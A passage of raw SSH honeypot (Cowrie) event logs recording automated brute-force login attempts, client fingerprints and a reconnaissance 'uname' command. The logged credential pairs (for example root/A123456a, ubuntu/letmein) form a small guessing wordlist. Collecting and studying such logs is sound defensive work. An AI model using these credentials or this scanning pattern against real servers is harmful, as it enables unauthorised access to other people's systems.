0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:41:59.400583Z","src_ip":"212.227.235.229","session":"95c4b3135b1e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":31818,"dst_ip":"1.2.3.4","dst_port":22,"session":"df7d39fab77f","protocol":"ssh","message":"New connection: 212.227.235.229:31818 (1.2.3.4:22) [session: df7d39fab77f]","sensor":"my-vps","timestamp":"2025-08-31T06:42:08.274998Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:42:08.276206Z","src_ip":"212.227.235.229","session":"df7d39fab77f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:42:08.493543Z","src_ip":"212.227.235.229","session":"df7d39fab77f"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"redhat","message":"login attempt [oracle/redhat] failed","sensor":"my-vps","timestamp":"2025-08-31T06:42:09.403727Z","src_ip":"212.227.235.229","session":"df7d39fab77f"}
{"eventid":"cowrie.login.success","username":"root","password":"A123456a","message":"login attempt [root/A123456a] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:42:09.749963Z","src_ip":"212.227.125.160","session":"aed4781d1292"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:42:10.625504Z","src_ip":"212.227.235.229","session":"df7d39fab77f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56756,"dst_ip":"1.2.3.4","dst_port":22,"session":"926efb8408dd","protocol":"ssh","message":"New connection: 212.227.235.229:56756 (1.2.3.4:22) [session: 926efb8408dd]","sensor":"my-vps","timestamp":"2025-08-31T06:42:23.829727Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:42:24.979933Z","src_ip":"212.227.235.229","session":"926efb8408dd"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:42:24.980807Z","src_ip":"212.227.235.229","session":"926efb8408dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37102,"dst_ip":"1.2.3.4","dst_port":22,"session":"b27f3d3d1223","protocol":"ssh","message":"New connection: 212.227.125.160:37102 (1.2.3.4:22) [session: b27f3d3d1223]","sensor":"my-vps","timestamp":"2025-08-31T06:42:29.609970Z"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"P@ssw0rd123","message":"login attempt [ubuntu/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:42:30.735742Z","src_ip":"212.227.235.229","session":"926efb8408dd"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:42:32.582129Z","src_ip":"212.227.235.229","session":"926efb8408dd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:42:43.885556Z","src_ip":"212.227.125.160","session":"aed4781d1292"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T06:42:43.886306Z","src_ip":"212.227.125.160","session":"aed4781d1292"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46774,"dst_ip":"1.2.3.4","dst_port":22,"session":"4592547ea40a","protocol":"ssh","message":"New connection: 212.227.125.160:46774 (1.2.3.4:22) [session: 4592547ea40a]","sensor":"my-vps","timestamp":"2025-08-31T06:42:45.184445Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:42:45.675019Z","src_ip":"212.227.125.160","session":"4592547ea40a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:42:45.675693Z","src_ip":"212.227.125.160","session":"4592547ea40a"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"P@ssw0rd123","message":"login attempt [ubuntu/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:42:48.528487Z","src_ip":"212.227.125.160","session":"4592547ea40a"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:42:50.007617Z","src_ip":"212.227.125.160","session":"4592547ea40a"}
{"eventid":"cowrie.session.closed","duration":"26.8","message":"Connection lost after 26.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:42:56.373427Z","src_ip":"212.227.125.160","session":"b27f3d3d1223"}
{"eventid":"cowrie.login.success","username":"root","password":"A123456a","message":"login attempt [root/A123456a] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:43:00.977845Z","src_ip":"212.227.235.229","session":"95c4b3135b1e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"31.8","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 31.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:43:15.728709Z","src_ip":"212.227.125.160","session":"aed4781d1292"}
{"eventid":"cowrie.session.closed","duration":"119.0","message":"Connection lost after 119.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:43:15.729795Z","src_ip":"212.227.125.160","session":"aed4781d1292"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50272,"dst_ip":"1.2.3.4","dst_port":22,"session":"fec245125a54","protocol":"ssh","message":"New connection: 212.227.235.229:50272 (1.2.3.4:22) [session: fec245125a54]","sensor":"my-vps","timestamp":"2025-08-31T06:43:18.993576Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35128,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a5b1fbe9dde","protocol":"ssh","message":"New connection: 212.227.235.229:35128 (1.2.3.4:22) [session: 8a5b1fbe9dde]","sensor":"my-vps","timestamp":"2025-08-31T06:43:23.180068Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:43:24.074958Z","src_ip":"212.227.235.229","session":"8a5b1fbe9dde"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:43:24.075801Z","src_ip":"212.227.235.229","session":"8a5b1fbe9dde"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45709,"dst_ip":"1.2.3.4","dst_port":22,"session":"df515bd127cc","protocol":"ssh","message":"New connection: 212.227.235.229:45709 (1.2.3.4:22) [session: df515bd127cc]","sensor":"my-vps","timestamp":"2025-08-31T06:43:27.512992Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:43:27.516136Z","src_ip":"212.227.235.229","session":"df515bd127cc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:43:27.729836Z","src_ip":"212.227.235.229","session":"df515bd127cc"}
{"eventid":"cowrie.login.failed","username":"user","password":"Admin@2026","message":"login attempt [user/Admin@2026] failed","sensor":"my-vps","timestamp":"2025-08-31T06:43:28.587101Z","src_ip":"212.227.235.229","session":"df515bd127cc"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:43:28.962764Z","src_ip":"212.227.235.229","session":"fec245125a54"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:43:28.964060Z","src_ip":"212.227.235.229","session":"fec245125a54"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:43:29.803867Z","src_ip":"212.227.235.229","session":"df515bd127cc"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"letmein","message":"login attempt [ubuntu/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T06:43:29.811600Z","src_ip":"212.227.235.229","session":"8a5b1fbe9dde"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:43:31.403240Z","src_ip":"212.227.235.229","session":"95c4b3135b1e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T06:43:31.403997Z","src_ip":"212.227.235.229","session":"95c4b3135b1e"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:43:31.538023Z","src_ip":"212.227.235.229","session":"8a5b1fbe9dde"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"6.9","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 6.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:43:38.322986Z","src_ip":"212.227.235.229","session":"95c4b3135b1e"}
{"eventid":"cowrie.session.closed","duration":"110.3","message":"Connection lost after 110.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:43:38.392107Z","src_ip":"212.227.235.229","session":"95c4b3135b1e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53214,"dst_ip":"1.2.3.4","dst_port":22,"session":"b05b5612c2bb","protocol":"ssh","message":"New connection: 212.227.125.160:53214 (1.2.3.4:22) [session: b05b5612c2bb]","sensor":"my-vps","timestamp":"2025-08-31T06:43:44.245342Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:43:44.676603Z","src_ip":"212.227.125.160","session":"b05b5612c2bb"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:43:44.677271Z","src_ip":"212.227.125.160","session":"b05b5612c2bb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:43:44.827870Z","src_ip":"212.227.235.229","session":"df6ff6f66642"}
{"eventid":"cowrie.session.closed","duration":180.2086100578308,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:43:44.831381Z","src_ip":"212.227.235.229","session":"df6ff6f66642"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"letmein","message":"login attempt [ubuntu/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T06:43:47.239038Z","src_ip":"212.227.125.160","session":"b05b5612c2bb"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:43:48.777142Z","src_ip":"212.227.125.160","session":"b05b5612c2bb"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":65246,"dst_ip":"1.2.3.4","dst_port":22,"session":"18ae40460f74","protocol":"ssh","message":"New connection: 217.72.205.35:65246 (1.2.3.4:22) [session: 18ae40460f74]","sensor":"my-vps","timestamp":"2025-08-31T06:44:04.645264Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:44:04.646562Z","src_ip":"217.72.205.35","session":"18ae40460f74"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"123456","message":"login attempt [elasticsearch/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T06:44:10.872590Z","src_ip":"212.227.235.229","session":"fec245125a54"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57374,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8f1cd29b444","protocol":"ssh","message":"New connection: 212.227.125.160:57374 (1.2.3.4:22) [session: d8f1cd29b444]","sensor":"my-vps","timestamp":"2025-08-31T06:44:13.652381Z"}
{"eventid":"cowrie.session.closed","duration":"58.5","message":"Connection lost after 58.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:44:17.445420Z","src_ip":"212.227.235.229","session":"fec245125a54"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:44:20.475783Z","src_ip":"212.227.125.160","session":"d8f1cd29b444"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:44:20.476772Z","src_ip":"212.227.125.160","session":"d8f1cd29b444"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41654,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e9135fb70c6","protocol":"ssh","message":"New connection: 212.227.235.229:41654 (1.2.3.4:22) [session: 8e9135fb70c6]","sensor":"my-vps","timestamp":"2025-08-31T06:44:22.085423Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:44:22.752349Z","src_ip":"212.227.235.229","session":"8e9135fb70c6"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa"